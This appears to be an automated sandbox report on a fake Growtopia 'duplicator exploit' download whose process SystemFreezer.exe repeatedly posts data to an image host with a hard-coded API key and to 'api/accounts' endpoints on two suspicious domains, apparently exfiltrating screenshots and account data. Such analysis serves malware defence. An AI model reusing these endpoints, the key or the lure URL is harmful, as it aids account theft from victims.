                                    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid=
                                    Remote address:
                                    204.79.197.200:443
                                    Request
                                    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= HTTP/2.0
                                    host: g.bing.com
                                    accept-encoding: gzip, deflate
                                    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                                    cookie: MUID=2A476F7E58156B910E6D7CA9595D6AD8
                                    Response
                                    HTTP/2.0 204
                                    cache-control: no-cache, must-revalidate
                                    pragma: no-cache
                                    expires: Fri, 01 Jan 1990 00:00:00 GMT
                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                    access-control-allow-origin: *
                                    x-cache: CONFIG_NOCACHE
                                    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                    x-msedge-ref: Ref A: 1298DE09DCE44B9699EB991884C9C6DB Ref B: BRU30EDGE0907 Ref C: 2023-11-28T13:52:19Z
                                    date: Tue, 28 Nov 2023 13:52:18 GMT
                                   • US
                                    DNS
                                    200.197.79.204.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    200.197.79.204.in-addr.arpa
                                    IN PTR
                                    Response
                                    200.197.79.204.in-addr.arpa
                                    IN PTR
                                     a-0001.a-msedge.net
                                   • US
                                    DNS
                                    203.33.253.131.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    203.33.253.131.in-addr.arpa
                                    IN PTR
                                    Response
                                    203.33.253.131.in-addr.arpa
                                    IN PTR
                                     a-0003.dc-msedge.net
                                   • US
                                    DNS
                                    103.169.127.40.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    103.169.127.40.in-addr.arpa
                                    IN PTR
                                    Response
                                   • US
                                    DNS
                                    15.164.165.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    15.164.165.52.in-addr.arpa
                                    IN PTR
                                    Response
                                   • US
                                    DNS
                                    25.14.97.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    25.14.97.104.in-addr.arpa
                                    IN PTR
                                    Response
                                    25.14.97.104.in-addr.arpa
                                    IN PTR
                                     a104-97-14-25.deploy.static.akamaitechnologies.com
                                   • US
                                    DNS
                                    google.com
                                    SystemFreezer.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    google.com
                                    IN A
                                    Response
                                    google.com
                                    IN A
                                    142.250.179.142
                                   • NL
                                    GET
                                    http://google.com/generate_204
                                    SystemFreezer.exe
                                    Remote address:
                                    142.250.179.142:80
                                    Request
                                    GET /generate_204 HTTP/1.1
                                    Host: google.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 204 No Content
                                    Content-Length: 0
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Date: Tue, 28 Nov 2023 13:52:44 GMT
                                   • US
                                    DNS
                                    142.179.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    142.179.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    142.179.250.142.in-addr.arpa
                                    IN PTR
                                     ams17s10-in-f14.1e100.net
                                   • US
                                    DNS
                                    api.imgbb.com
                                    SystemFreezer.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    api.imgbb.com
                                    IN A
                                    Response
                                    api.imgbb.com
                                    IN A
                                    188.114.97.0
                                    api.imgbb.com
                                    IN A
                                    188.114.96.0
                                   • US
                                    POST
                                    https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449
                                    SystemFreezer.exe
                                    Remote address:
                                    188.114.97.0:443
                                    Request
                                    POST /1/upload?key=78adae1bfa0e608b56435fa339987449 HTTP/1.1
                                    Accept: application/json
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: api.imgbb.com
                                    Content-Length: 88722
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:52:46 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    access-control-allow-origin: *
                                    access-control-allow-headers: Cache-Control, X-Requested-With, Content-Type
                                    access-control-allow-methods: POST, GET, OPTIONS
                                    last-modified: Tue, 28 Nov 2023 13:52:46GMT
                                    Cache-Control: no-cache, must-revalidate
                                    pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nR7K3DEl6%2B1A5zUIIZ7%2FO1PFT9WeS25o5cm14RpuFXCOVyB9Hqae%2F%2Bq9Bt1e%2BLCq0d2er%2B2mu%2Blv8LYtP3GHIEWtbRae6Gfp55lVCG32beY8BEBc7%2Fe5p4F9I4fzYUJ6"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d317e10c651c84-AMS
                                    alt-svc: h3=":443"; ma=86400
                                   • US
                                    DNS
                                    eterprx.net
                                    SystemFreezer.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    eterprx.net
                                    IN A
                                    Response
                                    eterprx.net
                                    IN A
                                    104.21.20.223
                                    eterprx.net
                                    IN A
                                    172.67.194.181
                                   • US
                                    POST
                                    https://eterprx.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    104.21.20.223:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eterprx.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:52:46 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 29
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=g2SoWJbe4Y%2F0aaV0UQAIV0h3Yds86HpCr49IZLrazNoSGrIkBwoYj7x%2Fk0NsDuHZ667Weun2TM7hd56oMyvOzPURgghnHVNq1E%2BYVFVAbwH0XGhf4ntRTe6nXA8HDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d317e20e29660a-AMS
                                    alt-svc: h3=":443"; ma=86400
                                   • US
                                    DNS
                                    eternitypr.net
                                    SystemFreezer.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    eternitypr.net
                                    IN A
                                    Response
                                    eternitypr.net
                                    IN A
                                    172.67.199.29
                                    eternitypr.net
                                    IN A
                                    104.21.21.142
                                   • US
                                    POST
                                    https://eternitypr.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    172.67.199.29:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eternitypr.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:52:46 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 29
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=azgDfX1WpJ2aHj%2FRSDTITfaauazqt5DLLoHgMY0c4xMCY2mVwXPTzjHtxN%2B8PTZLgq3697ZG8E5I6J8n6lqaamwP3rerDTd5c6j5gecF0CvglkILQJ4WQnpRfplyErr86w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d317e3294e1c90-AMS
                                    alt-svc: h3=":443"; ma=86400
                                   • US
                                    DNS
                                    0.97.114.188.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    0.97.114.188.in-addr.arpa
                                    IN PTR
                                    Response
                                   • US
                                    DNS
                                    223.20.21.104.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    223.20.21.104.in-addr.arpa
                                    IN PTR
                                    Response
                                   • US
                                    DNS
                                    29.199.67.172.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    29.199.67.172.in-addr.arpa
                                    IN PTR
                                    Response
                                   • US
                                    DNS
                                    126.23.238.8.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    126.23.238.8.in-addr.arpa
                                    IN PTR
                                    Response
                                   • NL
                                    GET
                                    http://google.com/generate_204
                                    SystemFreezer.exe
                                    Remote address:
                                    142.250.179.142:80
                                    Request
                                    GET /generate_204 HTTP/1.1
                                    Host: google.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 204 No Content
                                    Content-Length: 0
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Date: Tue, 28 Nov 2023 13:53:15 GMT
                                   • US
                                    POST
                                    https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449
                                    SystemFreezer.exe
                                    Remote address:
                                    188.114.97.0:443
                                    Request
                                    POST /1/upload?key=78adae1bfa0e608b56435fa339987449 HTTP/1.1
                                    Accept: application/json
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: api.imgbb.com
                                    Content-Length: 88780
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:53:16 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    access-control-allow-origin: *
                                    access-control-allow-headers: Cache-Control, X-Requested-With, Content-Type
                                    access-control-allow-methods: POST, GET, OPTIONS
                                    last-modified: Tue, 28 Nov 2023 13:53:16GMT
                                    Cache-Control: no-cache, must-revalidate
                                    pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GEPM15lB6tRIsJyYLAxLVT%2BEcQN53bsKi79jz8zG2%2B4zzUiZvrDPYlI%2BEYZZhTiKzqLiihW39ToghQ18VLQR7OvhX8z2Ox9y6UuRYMMo%2BNRqZm2lt6JOHBAKIcTCUgmM"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d3189b88ddb706-AMS
                                    alt-svc: h3=":443"; ma=86400
                                   • US
                                    POST
                                    https://eterprx.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    104.21.20.223:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eterprx.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:53:16 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 28
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YmnFOMNDQkke2l8x%2FKTruPQUoNAzPTOUNO1p0wX6A2hGCObPhFhOVcFMzG9teDeDgvbUUlTjABdVLuSBhopH%2BDI5yR3XlVQJQ%2BtR%2Byu3GJjt6CLULvcs4C8xns2MUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d3189c59896692-AMS
                                    alt-svc: h3=":443"; ma=86400
                                   • US
                                    POST
                                    https://eternitypr.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    172.67.199.29:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eternitypr.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:53:16 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 28
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eRcas3BbTw3P8IdEIN%2FVjyXQRjguIsIuQrd7Oym07aDodeWbKQYcln5sXxmJFG3MJb6tJBjI5J2cCK2KFnzFaibj9kB1ytAv6WSI5avR8SyX2PSJqJkJUwq5tJX8lNoPNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d3189d4c0c0bb0-AMS
                                    alt-svc: h3=":443"; ma=86400
                                   • US
                                    DNS
                                    43.229.111.52.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    43.229.111.52.in-addr.arpa
                                    IN PTR
                                    Response
                                   • NL
                                    GET
                                    http://google.com/generate_204
                                    SystemFreezer.exe
                                    Remote address:
                                    142.250.179.142:80
                                    Request
                                    GET /generate_204 HTTP/1.1
                                    Host: google.com
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 204 No Content
                                    Content-Length: 0
                                    Cross-Origin-Resource-Policy: cross-origin
                                    Date: Tue, 28 Nov 2023 13:54:01 GMT
                                   • US
                                    POST
                                    https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449
                                    SystemFreezer.exe
                                    Remote address:
                                    188.114.97.0:443
                                    Request
                                    POST /1/upload?key=78adae1bfa0e608b56435fa339987449 HTTP/1.1
                                    Accept: application/json
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: api.imgbb.com
                                    Content-Length: 88780
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:54:01 GMT
                                    Content-Type: application/json; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    access-control-allow-origin: *
                                    access-control-allow-headers: Cache-Control, X-Requested-With, Content-Type
                                    access-control-allow-methods: POST, GET, OPTIONS
                                    last-modified: Tue, 28 Nov 2023 13:54:01GMT
                                    Cache-Control: no-cache, must-revalidate
                                    pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BzleUYrKox51CBFm7Un1McYrcmpBUaHIfXFIPJoyIvwi%2FHYX0gRUscAzDtrfsARRUZryJd6goc93ufvSEq5SnR3zSSizg6t9ILrqdmNTTCwzcOCaz%2FBeY3%2FKf%2F5o%2B6%2Bx"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d319ba198a672a-AMS
                                    alt-svc: h3=":443"; ma=86400
                                   • US
                                    POST
                                    https://eterprx.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    104.21.20.223:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eterprx.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:54:02 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 29
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q0K2PDqlyhJiP78NPPqam4opuXZvH1HAytYz5zsKIUhPEwrJFtrgsx8eYqysDX1YLpkjhymo5QPQO9cX5Wg2eMXCZvMcKAzeHxAWsEwqZCAf3s1hnwH%2B1hC0Er4I6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d319bb1e220e6c-AMS
                                    alt-svc: h3=":443"; ma=86400
                                  • flag-us
                                    POST
                                    https://eternitypr.net/api/accounts
                                    SystemFreezer.exe
                                    Remote address:
                                    172.67.199.29:443
                                    Request
                                    POST /api/accounts HTTP/1.1
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: eternitypr.net
                                    Content-Length: 221
                                    Connection: Keep-Alive
                                    Response
                                    HTTP/1.1 400 Bad Request
                                    Date: Tue, 28 Nov 2023 13:54:02 GMT
                                    Content-Type: application/json
                                    Content-Length: 23
                                    Connection: keep-alive
                                    x-powered-by: PHP/7.2.34
                                    cache-control: no-cache, private
                                    x-ratelimit-limit: 30
                                    x-ratelimit-remaining: 29
                                    vary: User-Agent
                                    x-turbo-charged-by: LiteSpeed
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fGvCic%2F%2BvYKvSEr%2BFRdpyQ0OSjANvkOKkXQmziFSZt7qUgpj%2FQoMJaYY2zPXq6xFUSh1GcgAj3gbdNhmI%2B8j7JgVeCxsTFxxlf%2BAwLT3ooMGtpT2FsPQsdGuhYFNFW090A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 82d319bcfef8669f-AMS
                                    alt-svc: h3=":443"; ma=86400
                                  • flag-us
                                    DNS
                                    9.73.50.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    9.73.50.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  Connections (remote address | name | protocol | process | bytes sent / received | packets sent / received); a dash marks a column the report leaves empty, and where the name is the request URL it appears once, on the request line beneath.
                                  • 140.82.121.4:443 | tls, http2 | msedge.exe | 2.0kB / 7.3kB | 17 / 18
                                    GET https://github.com/L3GOGT/Growtopia-Duplicator-Exploit/releases/download/working/GT.Duplicator.Exploit.zip -> 302
                                  • 140.82.121.4:443 | github.com | tls | msedge.exe | 1.1kB / 3.3kB | 11 / 8
                                  • 185.199.108.133:443 | tls, http2 | msedge.exe | 13.2kB / 650.5kB | 254 / 493
                                    GET https://objects.githubusercontent.com/github-production-release-asset-2e65be/720728519/61dfee5a-f15d-4efe-af74-89e64074c3e8?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20231128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20231128T135213Z&X-Amz-Expires=300&X-Amz-Signature=015bdac000d887ef1119379a29a54a90df4fc22aa6110245de2f8a59376b7574&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=720728519&response-content-disposition=attachment%3B%20filename%3DGT.Duplicator.Exploit.zip&response-content-type=application%2Foctet-stream -> 200
                                  • 204.79.197.200:443 | tls, http2 | - | 1.9kB / 9.3kB | 22 / 20
                                    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= -> 204
                                    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= -> 204
                                    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=bcbb8f4ef115421f80ba1d9d12532185&localId=w:5DA71B07-9A86-3028-7BAC-0A2B03A6FF03&deviceId=6896189400010801&anid= -> 204
                                  • 142.250.179.142:80 | http | SystemFreezer.exe | 302 B / 259 B | 5 / 3
                                    GET http://google.com/generate_204 -> 204
                                  • 188.114.97.0:443 | tls, http | SystemFreezer.exe | 92.4kB / 7.5kB | 73 / 39
                                    POST https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449 -> 400
                                  • 104.21.20.223:443 | tls, http | SystemFreezer.exe | 1.1kB / 3.9kB | 9 / 8
                                    POST https://eterprx.net/api/accounts -> 400
                                  • 172.67.199.29:443 | tls, http | SystemFreezer.exe | 1.1kB / 3.9kB | 9 / 8
                                    POST https://eternitypr.net/api/accounts -> 400
                                  • 142.250.179.142:80 | http | SystemFreezer.exe | 302 B / 259 B | 5 / 3
                                    GET http://google.com/generate_204 -> 204
                                  • 188.114.97.0:443 | tls, http | SystemFreezer.exe | 92.4kB / 7.3kB | 73 / 36
                                    POST https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449 -> 400
                                  • 104.21.20.223:443 | tls, http | SystemFreezer.exe | 1.1kB / 3.9kB | 9 / 8
                                    POST https://eterprx.net/api/accounts -> 400
                                  • 172.67.199.29:443 | tls, http | SystemFreezer.exe | 1.1kB / 3.9kB | 9 / 8
                                    POST https://eternitypr.net/api/accounts -> 400
                                  • 142.250.179.142:80 | http | SystemFreezer.exe | 302 B / 259 B | 5 / 3
                                    GET http://google.com/generate_204 -> 204
                                  • 188.114.97.0:443 | tls, http | SystemFreezer.exe | 92.4kB / 7.4kB | 73 / 38
                                    POST https://api.imgbb.com/1/upload?key=78adae1bfa0e608b56435fa339987449 -> 400
                                  • 104.21.20.223:443 | tls, http | SystemFreezer.exe | 1.1kB / 3.9kB | 9 / 8
                                    POST https://eterprx.net/api/accounts -> 400
                                  • 172.67.199.29:443 | tls, http | SystemFreezer.exe | 1.1kB / 3.9kB | 9 / 8
                                    POST https://eternitypr.net/api/accounts -> 400
                                  • 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | dns | - | 71 B / 157 B | 1 / 1
                                    DNS request 67.31.126.40.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | github.com | dns | msedge.exe | 56 B / 72 B | 1 / 1
                                    DNS request github.com -> 140.82.121.4
                                  • 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | dns | - | 71 B / 115 B | 1 / 1
                                    DNS request 4.121.82.140.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | dns | - | 73 B / 144 B | 1 / 1
                                    DNS request 95.221.229.192.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | 198.1.85.104.in-addr.arpa | dns | - | 71 B / 135 B | 1 / 1
                                    DNS request 198.1.85.104.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | objects.githubusercontent.com | dns | msedge.exe | 75 B / 139 B | 1 / 1
                                    DNS request objects.githubusercontent.com -> 185.199.108.133, 185.199.109.133, 185.199.110.133, 185.199.111.133
                                  • 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | dns | - | 74 B / 118 B | 1 / 1
                                    DNS request 133.108.199.185.in-addr.arpa (no response shown)
                                  • 224.0.0.251:5353 | - | - | - | 514 B / - | 8 / -
                                  • 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | dns | - | 70 B / 156 B | 1 / 1
                                    DNS request 9.228.82.20.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | g.bing.com | dns | - | 56 B / 158 B | 1 / 1
                                    DNS request g.bing.com -> 204.79.197.200, 13.107.21.200
                                  • 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | dns | - | 73 B / 106 B | 1 / 1
                                    DNS request 200.197.79.204.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | 203.33.253.131.in-addr.arpa | dns | - | 73 B / 107 B | 1 / 1
                                    DNS request 203.33.253.131.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | dns | - | 73 B / 147 B | 1 / 1
                                    DNS request 103.169.127.40.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | dns | - | 72 B / 146 B | 1 / 1
                                    DNS request 15.164.165.52.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | dns | - | 71 B / 135 B | 1 / 1
                                    DNS request 25.14.97.104.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | google.com | dns | SystemFreezer.exe | 56 B / 72 B | 1 / 1
                                    DNS request google.com -> 142.250.179.142
                                  • 8.8.8.8:53 | 142.179.250.142.in-addr.arpa | dns | - | 74 B / 113 B | 1 / 1
                                    DNS request 142.179.250.142.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | api.imgbb.com | dns | SystemFreezer.exe | 59 B / 91 B | 1 / 1
                                    DNS request api.imgbb.com -> 188.114.97.0, 188.114.96.0
                                  • 8.8.8.8:53 | eterprx.net | dns | SystemFreezer.exe | 57 B / 89 B | 1 / 1
                                    DNS request eterprx.net -> 104.21.20.223, 172.67.194.181
                                  • 8.8.8.8:53 | eternitypr.net | dns | SystemFreezer.exe | 60 B / 92 B | 1 / 1
                                    DNS request eternitypr.net -> 172.67.199.29, 104.21.21.142
                                  • 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | dns | - | 71 B / 133 B | 1 / 1
                                    DNS request 0.97.114.188.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | 223.20.21.104.in-addr.arpa | dns | - | 72 B / 134 B | 1 / 1
                                    DNS request 223.20.21.104.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | 29.199.67.172.in-addr.arpa | dns | - | 72 B / 134 B | 1 / 1
                                    DNS request 29.199.67.172.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | 126.23.238.8.in-addr.arpa | dns | - | 71 B / 125 B | 1 / 1
                                    DNS request 126.23.238.8.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | dns | - | 72 B / 158 B | 1 / 1
                                    DNS request 43.229.111.52.in-addr.arpa (no response shown)
                                  • 8.8.8.8:53 | 9.73.50.20.in-addr.arpa | dns | - | 69 B / 155 B | 1 / 1
                                    DNS request 9.73.50.20.in-addr.arpa (no response shown)

                                  MITRE ATT&CK Enterprise v15

                                  Downloads

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\8098e008-9e02-4728-bf94-30b8a677882a.tmp (10KB)

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat (152B)

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State (265B)

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State (111B)

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (5KB)

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (5KB)

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (24KB)

                                    MD5

                                    5a6206a3489650bf4a9c3ce44a428126

                                    SHA1

                                    3137a909ef8b098687ec536c57caa1bacc77224b

                                    SHA256

                                    0a9e623c6df237c02a585539bffb8249de48949c6d074fe0aaf43063731a3e28

                                    SHA512

                                    980da83c3142bf08433ec1770a2ec5f5560daf3ee680466f89beae8290e921c0db677489daad055fbc1f196388f8bc4f60e050600381f860b06d330062440a78

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                    Filesize

                                    16B

                                    MD5

                                    6752a1d65b201c13b62ea44016eb221f

                                    SHA1

                                    58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                    SHA256

                                    0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                    SHA512

                                    9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                    Filesize

                                    10KB

                                    MD5

                                    3360cb9430c3e9491d08df94ce7aa18b

                                    SHA1

                                    7dfc1554ec47ab9a472d47e77baf064a371860b7

                                    SHA256

                                    9ddf1048c52129818182bf4d8150ac4c3e3845d08d6dce9b1350256216ac33fe

                                    SHA512

